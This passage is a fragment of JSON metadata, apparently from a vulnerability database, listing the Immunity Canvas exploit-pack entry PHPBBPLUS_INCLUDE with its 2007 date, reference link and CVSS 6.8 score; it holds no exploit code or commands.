"2007-09-20T17:17:00", "published": "2007-09-20T17:17:00", "id": "PHPBBPLUS_INCLUDE", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/phpbbplus_include", "type": "canvas", "title": "Immunity Canvas: PHPBBPLUS_INCLUDE", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}